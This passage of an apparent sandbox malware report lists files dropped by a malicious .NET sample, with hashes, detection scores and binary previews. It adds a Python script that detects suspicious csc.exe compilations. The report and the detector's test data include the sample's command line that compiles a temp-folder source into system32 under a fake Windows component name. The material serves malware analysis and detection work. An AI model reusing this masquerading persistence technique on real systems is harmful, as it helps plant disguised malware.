                                                                                    Category:dropped
                                                                                    Size (bytes):250
                                                                                    Entropy (8bit):5.011117393301097
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fF0s9n:Hu7L//TRq79cQWfdD
                                                                                    MD5:D0ED8693FA323D4A854F74597F76C1E5
                                                                                    SHA1:BDFB8C2ED4A498B417B459AC4718F58E4204CF90
                                                                                    SHA-256:B269BC5ED3C72F31BBB1226F4CC642306B78DD31D7C0BA349144BCE261C9262A
                                                                                    SHA-512:EBAF4E42EE741A2F536B1122EAA42A0AB19FAFA56F369177523A1585C4B0D1ADE1DB2EB0B3FA00D1A3A0387E972106EC798A59ECAC65B773ED13FE72C7AB8ABA
                                                                                    Malicious:true
                                                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.0.cs"
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):750
                                                                                    Entropy (8bit):5.230430957019079
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:KJN/I/u7L//TRq79cQWfdiKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfdiKax5DqBVKVrdFAw
                                                                                    MD5:8B9E227BA9469DC0B6D24667D1476255
                                                                                    SHA1:C3C8B9AE2F73A0FF8AE0DCB66F9656ABF65658EA
                                                                                    SHA-256:3110A96D2D8298E7860EF210A14E6544761AC37FD8EABB551FE99DBD11980544
                                                                                    SHA-512:03B9F9EC3ADC890893A5C72FA2717CE41069CDAA6691ACA580E260B26C9F89CB12EC3EB4A56159D9CF5A855A41ECD28AB55EFBB40F25210B37770DDECDB72243
                                                                                    Malicious:false
                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
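The three dropped files above (the C# source, the csc.exe argument file and the compiler's console output) record the sample compiling a small launcher from %LOCALAPPDATA%\Temp straight into C:\Windows\system32 under a Windows component's name, which is the behaviour behind the "Dot net compiler compiles file from suspicious location" Sigma hit. The following is an added detection example, not code from the report or from the sample: it parses csc.exe command lines as they would appear in process-creation telemetry and flags the two markers seen here (output under a protected directory, source under a temp directory). The command lines it runs on are constructed; the first mirrors the invocation recorded above, the second is a plausible benign build.

```python
"""Flag csc.exe invocations that compile scratch sources into system directories.

Added example for this report; not code from the sample or from Joe Sandbox.
SAMPLE_CMDLINES are constructed. The first mirrors the csc.exe command line
recorded in the dropped argument file above; the second is an assumed benign
build used as a negative case.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed process-creation command lines (e.g. Sysmon EventID 1 / 4688 CommandLine).
SAMPLE_CMDLINES = [
    # 1. mirrors the report: source in %LOCALAPPDATA%\Temp, output into system32
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output '
    r'/R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" '
    r'/out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ '
    r'/target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.0.cs"',
    # 2. assumed benign build: project directory in, project directory out
    r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig '
    r'/out:"C:\Build\app\bin\app.exe" "C:\Build\app\Program.cs"',
]

# Directories where a freshly compiled binary should never land (lower-case prefixes).
PROTECTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
# Path fragments that mark a scratch location for the source file.
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")

# A token is any run of non-space text in which quoted spans may be embedded,
# so /out:"C:\Program Files\x.exe" survives as one token.
_TOKEN = re.compile(r'(?:[^\s"]+|"[^"]*")+')


@dataclass
class CscInvocation:
    out: Optional[str]      # value of /out:, None when csc picks the default name
    sources: List[str]      # positional arguments, i.e. the source files


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, honouring and stripping quotes."""
    return [m.group(0).replace('"', "") for m in _TOKEN.finditer(cmdline)]


def parse_csc(cmdline: str) -> Optional[CscInvocation]:
    """Return the output target and source files of a csc.exe invocation,
    or None if the command line is not csc.exe at all."""
    toks = tokenize(cmdline)
    if not toks or not toks[0].lower().endswith("csc.exe"):
        return None
    out: Optional[str] = None
    sources: List[str] = []
    for tok in toks[1:]:
        low = tok.lower()
        if low.startswith("/out:"):
            out = tok[len("/out:"):]
        elif low.startswith(("/", "-", "@")):
            continue  # other compiler switches and response files
        else:
            sources.append(tok)
    return CscInvocation(out=out, sources=sources)


def assess(cmdline: str) -> List[str]:
    """Findings for one command line; an empty list means nothing suspicious."""
    info = parse_csc(cmdline)
    if info is None:
        return []
    findings: List[str] = []
    out = info.out or ""
    if out.lower().startswith(PROTECTED_PREFIXES):
        findings.append(f"compiler output written under a protected directory: {out}")
    for src in info.sources:
        if any(marker in src.lower() for marker in TEMP_MARKERS):
            findings.append(f"source file compiled from a temp directory: {src}")
    return findings


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        for finding in assess(line) or ["no finding"]:
            print(finding)
```

Both markers fire on the first command line and neither on the second. In production the same two checks would be joined to the parent process (here the sample on the user's Desktop rather than MSBuild or an IDE) and to a file-creation event for the /out: path, since the report also shows the compiled binary landing on the legitimate SecurityHealthSystray.exe path.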
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with very long lines (904), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):904
                                                                                    Entropy (8bit):5.91725409161719
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:IG94wL4jL2b+BASGcATxOgUCuGMaQHc7nqB1f1v1tw6J/:IG94z2b+BhD1nGMaqcGrdNB
                                                                                    MD5:ABF6FA81156E57413B7EABD0688B37E4
                                                                                    SHA1:17C4D49DE2F16A6E3F0AF1E267280D795F3DD3C8
                                                                                    SHA-256:6A8BE8EBB25EC12D7F56903B2EF88153A71FE8F72E3A043DAF0834F201573891
                                                                                    SHA-512:7ACBDA378034FF11B21B3CB57B81F50CD1FA986D30EC316C88A272E119BC1EE42B13213DD1AA2DDB39CAF89C12F1B19475570AB152E0F10776F99D21188EFB39
                                                                                    Malicious:false
                                                                                    Preview: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
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23552
                                                                                    Entropy (8bit):5.519109060441589
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: 4si9noTBNw.exe, Detection: malicious
                                                                                    • Filename: FToZAUe1tw.exe, Detection: malicious
                                                                                    • Filename: fnNUIS1KeW.exe, Detection: malicious
                                                                                    • Filename: kqq1aAcVUQ.exe, Detection: malicious
                                                                                    • Filename: Qsi7IgkrWa.exe, Detection: malicious
                                                                                    • Filename: qNdO4D18CF.exe, Detection: malicious
                                                                                    • Filename: 4Awb1u1GcJ.exe, Detection: malicious
                                                                                    • Filename: LzmJLVB41K.exe, Detection: malicious
                                                                                    • Filename: s5duotgoYD.exe, Detection: malicious
                                                                                    • Filename: QMT2731i8k.exe, Detection: malicious
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Recovery\USZqVcJFLA.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):69632
                                                                                    Entropy (8bit):5.932541123129161
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                    Process:C:\Recovery\USZqVcJFLA.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):85504
                                                                                    Entropy (8bit):5.8769270258874755
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):69632
                                                                                    Entropy (8bit):5.932541123129161
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                                    Process:C:\Recovery\USZqVcJFLA.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32256
                                                                                    Entropy (8bit):5.631194486392901
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Recovery\USZqVcJFLA.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):23552
                                                                                    Entropy (8bit):5.519109060441589
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):32256
                                                                                    Entropy (8bit):5.631194486392901
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):85504
                                                                                    Entropy (8bit):5.8769270258874755
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):119
                                                                                    Entropy (8bit):5.683565952489309
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:BU/vElDHfh0C2yq+UOdkBGuE067oqcydp1WKHnt:AvifhE0VdksAIs16t
                                                                                    MD5:8454F1A3BE7F91648FBD87DBF4AEF687
                                                                                    SHA1:1AD779017CC6B95BF5779915B7602BABBC4F5FFF
                                                                                    SHA-256:34E8E305A8EFAD664A0DE81D43B0FE7888FD6DECE2BA3AF1B66792E3988A7E74
                                                                                    SHA-512:345EFF068BEE161014E825860A5F3CFEE0D84CDE021573EC2136799EB9A586D414388EAD787C8704BEF478A3175F7619F1E65B044EDD6B3C84C22198C49C7279
                                                                                    Malicious:false
                                                                                    Preview:lEk3vb5oGbeDHdSjNQMvS7Ya2vvnlOsRCJFzqTM6Rde8KgJ698eAZkxopJA9qSC1tMB8Xc24EQezcaQWmynnur1bVbKhSMP9bmO7fLihFj6JF8LP3oW1oYH
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                    Category:dropped
                                                                                    Size (bytes):1560958
                                                                                    Entropy (8bit):7.974265283144141
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:K17t7ROjwJqMAVS2hEijP79eAPkavlCCyYcBoZ11q8UuZPt5PsuWg:KBt7R0wJ4L5Uw5lCCyG31oIPmg
                                                                                    MD5:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    SHA1:B63D8E25D4EB9ABEA3ED0F7867F70DB2AB18CBA2
                                                                                    SHA-256:CB4626AD921C63113E18C3AEFB109F70C8E334089871133EA675D62D836D810B
                                                                                    SHA-512:FF51CCD8918344BB0439A4D9E39394383BFF2196496D778DB9A3D2862479E55F1BF59C7D467FF055C721231CB592C3C7DED63C5AF28A3F9552DC6421DD1151BF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:false
                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):1224
                                                                                    Entropy (8bit):4.435108676655666
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4608
                                                                                    Entropy (8bit):3.9848906490496727
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:6hJXPt3uM7Jt8Bs3FJsdcV4MKe278qd2vqBHqOulajfqXSfbNtm:8PdPc+Vx9M8dvkUcjRzNt
                                                                                    MD5:0543CDD3BE612415A6D0082B0C2F06DE
                                                                                    SHA1:23CE6B41AD09ABC689EAB08F3D24D794C3035116
                                                                                    SHA-256:8DD6C11FCEE53625B1C811EA5546D579D982F76356146EDDC7B917ABD9E86858
                                                                                    SHA-512:B132D73B6CA4DF1E411ECC370D3AC1133C1D318F1AD8D7E8128538B4FDEB52F5FF7C67C9F0D7FF4868C02B98E5B3C8747CA26B384D9031FA2D5E027C9E54DD99
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Xg.............................'... ...@....@.. ....................................@..................................'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..X.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.(.......#GUID...8... ...#Blob...........WU........%3................................................................
                                                                                    Process:C:\Windows\System32\PING.EXE
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):502
                                                                                    Entropy (8bit):4.613865166769504
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:P+5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:wdUOAokItULVDv
                                                                                    MD5:0C62BCEEB58984C75AB308E22503AA70
                                                                                    SHA1:CF8D1698639026FAB48CA3F1EE801976E3FEEFA4
                                                                                    SHA-256:F7D1BFF19697A4FBA3F60CCFC17FD4A9FF9CDB93F8E3074D550DA1610FA6389D
                                                                                    SHA-512:931367FECA43800FA9A8B899CADCF6FCE02D9A331F5F38B1F4DBAB24272F04FA75C39DC5393D581EA05E096190F9BD451783E8865C6475A83FA4D247371E71DC
                                                                                    Malicious:false
